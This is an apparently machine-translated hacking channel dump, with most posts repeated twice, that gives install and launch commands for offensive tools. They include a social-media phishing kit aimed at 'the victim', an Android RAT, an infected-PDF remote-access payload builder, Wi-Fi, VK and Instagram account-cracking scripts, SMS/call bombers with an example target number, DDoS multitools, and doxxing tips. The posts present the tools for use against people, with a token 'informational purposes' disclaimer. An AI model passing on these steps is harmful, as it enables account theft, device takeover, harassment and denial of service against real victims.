The coolest multitool for phishing!
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
GitHub
GitHub - noob-hackers/mrphish: All In One Social Accounts Phishing With Otp Bypass In Termux.
All In One Social Accounts Phishing With Otp Bypass In Termux. - noob-hackers/mrphish
Best Android RAT in Termux!
haxRat is a cloud-based Android remote control script based on NodeJS. With it, you can block calls on the device, see all files and pictures, listen to the microphone, monitor notifications and much more.
Installation
◽ apt install nodejs git
◽git clone https://github.com/hax4us/haxRat.git
◽cd haxRat / server
◽npm install
◽mkdir ~ / haxrat
Usage
$ node index.js
haxRat is a cloud-based Android remote control script based on NodeJS. With it, you can block calls on the device, see all files and pictures, listen to the microphone, monitor notifications and much more.
Installation
◽ apt install nodejs git
◽git clone https://github.com/hax4us/haxRat.git
◽cd haxRat / server
◽npm install
◽mkdir ~ / haxrat
Usage
$ node index.js
GitHub
GitHub - Hax4us/haxRat: A Android RAT with lots of features , check README for more information.
A Android RAT with lots of features , check README for more information. - Hax4us/haxRat
Breaking Wi-Fi with wi-toolkit!
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this requires an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this requires an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
GitHub
GitHub - mkdirlove/WI-TOOLKIT: Hack WiFi in Termux ( ROOTED DEVICES ONLY)
Hack WiFi in Termux ( ROOTED DEVICES ONLY). Contribute to mkdirlove/WI-TOOLKIT development by creating an account on GitHub.
Block Termux victim
Fireworks, bandits! If you are very tired of some schoolboy, then you can throw him a "super-megahacker tool", the student will install it and his terminal will be blocked.
Installation
$ git clone https://github.com/fuckwbored/termuxman
$ cd termuxman
Running
$ python3 termuxman.py
Block, have fun ✌️
Fireworks, bandits! If you are very tired of some schoolboy, then you can throw him a "super-megahacker tool", the student will install it and his terminal will be blocked.
Installation
$ git clone https://github.com/fuckwbored/termuxman
$ cd termuxman
Running
$ python3 termuxman.py
Block, have fun ✌️
HACKING PC THROUGH PDF FILE
The PDF format has many vulnerabilities, thanks to which viruses and the like can be embedded into files. This post introduces the automated Insanity Framework for creating an infected PDF file that will allow remote access to machines on Windows.
First, download Termux
Installation:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod + x insanity.py
$ ./install.sh
Usage:
$ sudo python2 insanity.py
On the first launch, all necessary dependencies will be installed and the main menu will open. In it, we select the first item to create the payload. Next, select Fake Acrobat PDF. Enter the ip address and port.
The PDF format has many vulnerabilities, thanks to which viruses and the like can be embedded into files. This post introduces the automated Insanity Framework for creating an infected PDF file that will allow remote access to machines on Windows.
First, download Termux
Installation:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod + x insanity.py
$ ./install.sh
Usage:
$ sudo python2 insanity.py
On the first launch, all necessary dependencies will be installed and the main menu will open. In it, we select the first item to create the payload. Next, select Fake Acrobat PDF. Enter the ip address and port.
GitHub
GitHub - 4w4k3/Insanity-Framework: Generate Payloads and Control Remote Machines. [Discontinued]
Generate Payloads and Control Remote Machines. [Discontinued] - 4w4k3/Insanity-Framework
🔍Find a person's location by IP!
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
GitHub
GitHub - noob-hackers/ipdrone: Track Location With Live Address And Accuracy In Termux
Track Location With Live Address And Accuracy In Termux - noob-hackers/ipdrone
VK hacking script
Vk-Tokenner is a script that will allow access to the victim's account through a token.
Installation
▪️apt update
▪️apt upgrade
▪️pkg install git
▪️pkg install python
▪️pkg install python2
▪️pip install vk
▪️pip install vk_api
▪️git clone https://github.com/XuliGan4eg2006/Vk-Tokenner-.git
▪️cd Vk-Tokenner
▪️pip3 install -r requirements.txt
Running
▪️python3 main.py
▪️python2 main.py
All information is provided for informational purposes only. We are not responsible for your actions.
Vk-Tokenner is a script that will allow access to the victim's account through a token.
Installation
▪️apt update
▪️apt upgrade
▪️pkg install git
▪️pkg install python
▪️pkg install python2
▪️pip install vk
▪️pip install vk_api
▪️git clone https://github.com/XuliGan4eg2006/Vk-Tokenner-.git
▪️cd Vk-Tokenner
▪️pip3 install -r requirements.txt
Running
▪️python3 main.py
▪️python2 main.py
All information is provided for informational purposes only. We are not responsible for your actions.
EmailSpamer.zip
4.1 MB
Spam in the mail
This utility is designed for mass mailing of emails to Email addresses.
This utility is designed for mass mailing of emails to Email addresses.
⚙️ S.E.Tools. Trape V2.
🖖🏻 Greetings user_name.
• Trape is a great tool for social engineer and #OSINT professionals that was introduced to the world at BlackHat Singapore in 2018 and was recently updated to version 2.0.
• For those who hear about this tool for the first time, the tool can create a # phishing link that allows us to track our target. With the help of Trape, we can get the IP address, geolocation and other necessary information about our goal. You can also remotely run js scripts and upload files to your PC, capture credentials.
• Description and installation information is available on Github: https://github.com/jofpin/trape
• Using the tool: https://eforensicsmag.com/trape-stable-v2-0-by-jose-pino/
# Note #Tools # SI. Your S.E.
🖖🏻 Greetings user_name.
• Trape is a great tool for social engineer and #OSINT professionals that was introduced to the world at BlackHat Singapore in 2018 and was recently updated to version 2.0.
• For those who hear about this tool for the first time, the tool can create a # phishing link that allows us to track our target. With the help of Trape, we can get the IP address, geolocation and other necessary information about our goal. You can also remotely run js scripts and upload files to your PC, capture credentials.
• Description and installation information is available on Github: https://github.com/jofpin/trape
• Using the tool: https://eforensicsmag.com/trape-stable-v2-0-by-jose-pino/
# Note #Tools # SI. Your S.E.
GitHub
GitHub - jofpin/trape: People tracker on the Internet: OSINT analysis and research tool by Jose Pino
People tracker on the Internet: OSINT analysis and research tool by Jose Pino - jofpin/trape
Testing a free Linux simulator!
If you decide to install Linux on your PC, then before you do so, you can try using it online.
The onworks.net website makes it possible to launch one of the popular Linux distributions directly from the browser: Ubuntu 19, Windows 10 Emulator, Parrot Security OS, Elementary OS, Debian, etc.
The functionality is a little limited from the usual OS, but the interface is the same. Distributions are hosted on free hosting.
If you decide to install Linux on your PC, then before you do so, you can try using it online.
The onworks.net website makes it possible to launch one of the popular Linux distributions directly from the browser: Ubuntu 19, Windows 10 Emulator, Parrot Security OS, Elementary OS, Debian, etc.
The functionality is a little limited from the usual OS, but the interface is the same. Distributions are hosted on free hosting.
https://github.com/evpo/EncryptPad
We encrypt the file in a couple of clicks!
EncryptPad is a text editor with which you can manage encrypted text and files, including images, video and audio.
To use, you must:
▷ Install EncryptPad.
▷ Select or create a text file in the application window.
▷ Click on the gear icon and select encryption options.
▷ Write any text to a file and click on "Encryption".
▷ Then click "Set Password", enter the password and save the file.
We encrypt the file in a couple of clicks!
EncryptPad is a text editor with which you can manage encrypted text and files, including images, video and audio.
To use, you must:
▷ Install EncryptPad.
▷ Select or create a text file in the application window.
▷ Click on the gear icon and select encryption options.
▷ Write any text to a file and click on "Encryption".
▷ Then click "Set Password", enter the password and save the file.
GitHub
GitHub - evpo/EncryptPad: Minimalist secure text editor and binary encryptor that implements RFC 4880 Open PGP format: symmetrically…
Minimalist secure text editor and binary encryptor that implements RFC 4880 Open PGP format: symmetrically encrypted, compressed and integrity protected. The editor can protect files with passwords...
🔍Find a person's location by IP!
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
GitHub
GitHub - noob-hackers/ipdrone: Track Location With Live Address And Accuracy In Termux
Track Location With Live Address And Accuracy In Termux - noob-hackers/ipdrone
Find out the hidden information about the user VK
Friends, I welcome everyone! In today's post, you will learn how you can find hidden information about any VK user.
Instructions:
1. Open the link https://vk.com/foaf.php?id= in the browser and after id = write the numbers from the victim's id;
└ You can find out the id by nickname here, for example https://vk.com/foaf.php?id=460060000;
2. Next, look at the source code of the page;
└ Firefox -> Right Click + Page Source
3. We study the source code - there you can find a whole klondike of useful information:
ya: created - the date the profile was created;
ya: modified - date of change of name in profile (for example, in case of divorce / marriage);
foaf: externalProfile - link to profiles in other social networks (including those that were indicated earlier, but are now hidden);
ya: bio - information "about yourself" that is not displayed on the page (often found in profiles registered 10 or more years ago);
ya: lastLoggedIn - date of the last entry, accurate to the second.
Friends, I welcome everyone! In today's post, you will learn how you can find hidden information about any VK user.
Instructions:
1. Open the link https://vk.com/foaf.php?id= in the browser and after id = write the numbers from the victim's id;
└ You can find out the id by nickname here, for example https://vk.com/foaf.php?id=460060000;
2. Next, look at the source code of the page;
└ Firefox -> Right Click + Page Source
3. We study the source code - there you can find a whole klondike of useful information:
ya: created - the date the profile was created;
ya: modified - date of change of name in profile (for example, in case of divorce / marriage);
foaf: externalProfile - link to profiles in other social networks (including those that were indicated earlier, but are now hidden);
ya: bio - information "about yourself" that is not displayed on the page (often found in profiles registered 10 or more years ago);
ya: lastLoggedIn - date of the last entry, accurate to the second.
❤1
Powerful SMS bomber impulse
This bomber has more than 60 services, is cross-platform software, runs on Linux, Windows, as well as Termux.
Windows (Requires Python 3.8)
Download Impulse from github https://github.com/LimerBoy/Impulse/
Open the command line in the software directory
We execute the commands:
pip install -r requirements.txt
•• python impulse.py --help
Linux
sudo apt update
• sudo apt install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse /
• pip3 install -r requirements.txt
• python3 impulse.py --help
Termux
pkg update
• pkg install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse /
• pip3 install -r requirements.txt
• python3 impulse.py --help
Launch example
python3 impulse.py --method SMS --time 20 --threads 15 --target +79255554566
Bombie, have fun ✌️
This bomber has more than 60 services, is cross-platform software, runs on Linux, Windows, as well as Termux.
Windows (Requires Python 3.8)
Download Impulse from github https://github.com/LimerBoy/Impulse/
Open the command line in the software directory
We execute the commands:
pip install -r requirements.txt
•• python impulse.py --help
Linux
sudo apt update
• sudo apt install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse /
• pip3 install -r requirements.txt
• python3 impulse.py --help
Termux
pkg update
• pkg install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse /
• pip3 install -r requirements.txt
• python3 impulse.py --help
Launch example
python3 impulse.py --method SMS --time 20 --threads 15 --target +79255554566
Bombie, have fun ✌️
GitHub
GitHub - LimerBoy/Impulse: :bomb: Impulse Denial-of-service ToolKit
:bomb: Impulse Denial-of-service ToolKit. Contribute to LimerBoy/Impulse development by creating an account on GitHub.
How to collect information about various devices?
Good day! Today we have prepared for you a tool with which you can find various devices that are connected to the Internet. There are a wide variety of device options from PCs to refrigerators or nuclear power plants, webcams, water treatment plants, coffee machines, yachts, medical devices, traffic lights, wind turbines, etc. This tool is called Shodan Eye → TYK ←.
Let's go!
1. For installation we use:
git clone https://github.com/BullsEye0/shodan-eye.git
$ cd shodan-eye
$ pip3 install -r requirements.txt
2. The use is carried out by means of the following command:
python3 shodan_eye.py
But in order to use the tool, you need an API Key, which can be obtained on the main page of Shodan → TYK ←.
Good day! Today we have prepared for you a tool with which you can find various devices that are connected to the Internet. There are a wide variety of device options from PCs to refrigerators or nuclear power plants, webcams, water treatment plants, coffee machines, yachts, medical devices, traffic lights, wind turbines, etc. This tool is called Shodan Eye → TYK ←.
Let's go!
1. For installation we use:
git clone https://github.com/BullsEye0/shodan-eye.git
$ cd shodan-eye
$ pip3 install -r requirements.txt
2. The use is carried out by means of the following command:
python3 shodan_eye.py
But in order to use the tool, you need an API Key, which can be obtained on the main page of Shodan → TYK ←.
GitHub
GitHub - BullsEye0/shodan-eye: Shodan Eye This tool collects all the information about all devices directly connected to the internet…
Shodan Eye This tool collects all the information about all devices directly connected to the internet using the specified keywords that you enter. Author: Jolanda de Koff - BullsEye0/shodan-eye
A set of tools for all occasions!
WannaTool is a catalog of tools that will definitely come in handy in your future life. For example, WannaTool has DDoS or Admin Panel finder, WhatsApp Spammer. In addition to hacking tools, WannaTool contains harmless utilities such as Google translator and solitaire.
Installation:
◾️ apt upgrade -y; apt update -y
◾️ git clone https://github.com/Err0r-ICA/WannaTool
◾️ cd WannaTool
◾️ chmod + x *
Launch:
◾️ bash WannaTool
Login key: ItaliaCyberArmy
WannaTool is a catalog of tools that will definitely come in handy in your future life. For example, WannaTool has DDoS or Admin Panel finder, WhatsApp Spammer. In addition to hacking tools, WannaTool contains harmless utilities such as Google translator and solitaire.
Installation:
◾️ apt upgrade -y; apt update -y
◾️ git clone https://github.com/Err0r-ICA/WannaTool
◾️ cd WannaTool
◾️ chmod + x *
Launch:
◾️ bash WannaTool
Login key: ItaliaCyberArmy
GitHub
GitHub - Err0r-ICA/WannaTool: Script collection
Script collection. Contribute to Err0r-ICA/WannaTool development by creating an account on GitHub.
A tool for in-depth search query across sites
DirAttack is a tool that allows you to search a file and directory on a website using keywords. Open source,
Installation
$ pkg install git python -y
$ git clone https://github.com/Ranginang67/DirAttack
$ cd DirAttack
$ chmod + x install.py
$ python install.py
Running
$ dirattack --help
-u set target url
-d use default wordlist
-w use wordlist
-r remove / remove dirattack
DirAttack is a tool that allows you to search a file and directory on a website using keywords. Open source,
Installation
$ pkg install git python -y
$ git clone https://github.com/Ranginang67/DirAttack
$ cd DirAttack
$ chmod + x install.py
$ python install.py
Running
$ dirattack --help
-u set target url
-d use default wordlist
-w use wordlist
-r remove / remove dirattack
GitHub
GitHub - Ranginang67/DirAttack: DirAttack tools, Search file or directory on website
DirAttack tools, Search file or directory on website - Ranginang67/DirAttack
A multitool for hacking!
"Hack the world with termux" is the slogan of the creators of the EasyHack utility. With its help, you can use only one utility to arrange ddos attacks, scan with nmap, brute force passwords and much more.
Installation in Termux
◽pkg update
◽pkg upgrade
◽pkg install git
◽git clone https://github.com/sabri-zaki/EasY_HaCk
◽cd EasY_HaCk /
◽chmod + x install.sh
◽. /install.sh
◽Type EasY-HaCk
To use the functionality of this utility, enter a number from 1 to 8 into the console:
1 - Generator of Payload
2 - Merasploit-installation of the framework
3- Installing BEEF framework for XSS attacks
4 - Installing NGROK
5- network scan using nmap
6- WEB-HAKI
7 - HACKING PASSWORD
8- start the web server
"Hack the world with termux" is the slogan of the creators of the EasyHack utility. With its help, you can use only one utility to arrange ddos attacks, scan with nmap, brute force passwords and much more.
Installation in Termux
◽pkg update
◽pkg upgrade
◽pkg install git
◽git clone https://github.com/sabri-zaki/EasY_HaCk
◽cd EasY_HaCk /
◽chmod + x install.sh
◽. /install.sh
◽Type EasY-HaCk
To use the functionality of this utility, enter a number from 1 to 8 into the console:
1 - Generator of Payload
2 - Merasploit-installation of the framework
3- Installing BEEF framework for XSS attacks
4 - Installing NGROK
5- network scan using nmap
6- WEB-HAKI
7 - HACKING PASSWORD
8- start the web server
GitHub
GitHub - sabri-zaki/EasY_HaCk: Hack the World using Termux
Hack the World using Termux. Contribute to sabri-zaki/EasY_HaCk development by creating an account on GitHub.
New SMS Call Bomber
SMS-bomber is a program or service designed to send bulk messages to a given number. In fact, the user unexpectedly gets a ton of inboxes. Many companies send SMS with a confirmation code, which the subscriber, of course, did not ask for.
Installation:
$ apt update && apt upgrade -y
$ pkg install git -y
$ git clone https://github.com/anubhavanonymous/XLR8_BOMBER
$ cd XLR8_BOMBER
Usage:
$ bash xlr8.sh
To launch the attack, you should select option 1 for SMS. Next, you will need to enter a phone number. After you enter the phone number and press the "Enter" key, the SMS will start sending, and if you want to stop it, just press CTRL + C on your keyboard.
SMS-bomber is a program or service designed to send bulk messages to a given number. In fact, the user unexpectedly gets a ton of inboxes. Many companies send SMS with a confirmation code, which the subscriber, of course, did not ask for.
Installation:
$ apt update && apt upgrade -y
$ pkg install git -y
$ git clone https://github.com/anubhavanonymous/XLR8_BOMBER
$ cd XLR8_BOMBER
Usage:
$ bash xlr8.sh
To launch the attack, you should select option 1 for SMS. Next, you will need to enter a phone number. After you enter the phone number and press the "Enter" key, the SMS will start sending, and if you want to stop it, just press CTRL + C on your keyboard.
GitHub
GitHub - anubhavanonymous/XLR8_BOMBER: A Superfast SMS & Call bomber for Linux And Termux !
A Superfast SMS & Call bomber for Linux And Termux ! - anubhavanonymous/XLR8_BOMBER
Create an html page with a fake message about a hacked resource
Sometimes you need to brainwash the interlocutor and impress him with hacking skills. This is where DefGen comes in handy.
Installation
$
$
Running
The result can be seen in the screenshot below ✌️
Sometimes you need to brainwash the interlocutor and impress him with hacking skills. This is where DefGen comes in handy.
Installation
$
termux-setup-storage$
pkg update -y && pkg upgrade$ -y; pkg install python2
$ git clone https://github.com/Err0r-ICA/DefGen
$ cd DefGenRunning
$ python2 DefGenThe result can be seen in the screenshot below ✌️
How to hack Instagram in a few clicks?
In this post, we will talk about carrying out an attack on an account on the Instagram social network by brute-force password brute-force. Even an ordinary schoolboy can carry out this attack.
To carry out such an attack, it is enough to follow a simple instruction:
Installation:
$ git clone https://github.com/tiptoettt/instashell
$ cd instashell
$ chmod + x instashell.sh
Usage:
$ service tor start
$ ./instashell.sh
Next, enter the Username of your Instagram account and the path to the password dictionary.
In this post, we will talk about carrying out an attack on an account on the Instagram social network by brute-force password brute-force. Even an ordinary schoolboy can carry out this attack.
To carry out such an attack, it is enough to follow a simple instruction:
Installation:
$ git clone https://github.com/tiptoettt/instashell
$ cd instashell
$ chmod + x instashell.sh
Usage:
$ service tor start
$ ./instashell.sh
Next, enter the Username of your Instagram account and the path to the password dictionary.
GitHub
GitHub - tiptoettt/instashell: Instagram Brute Forcer without password limit
Instagram Brute Forcer without password limit. Contribute to tiptoettt/instashell development by creating an account on GitHub.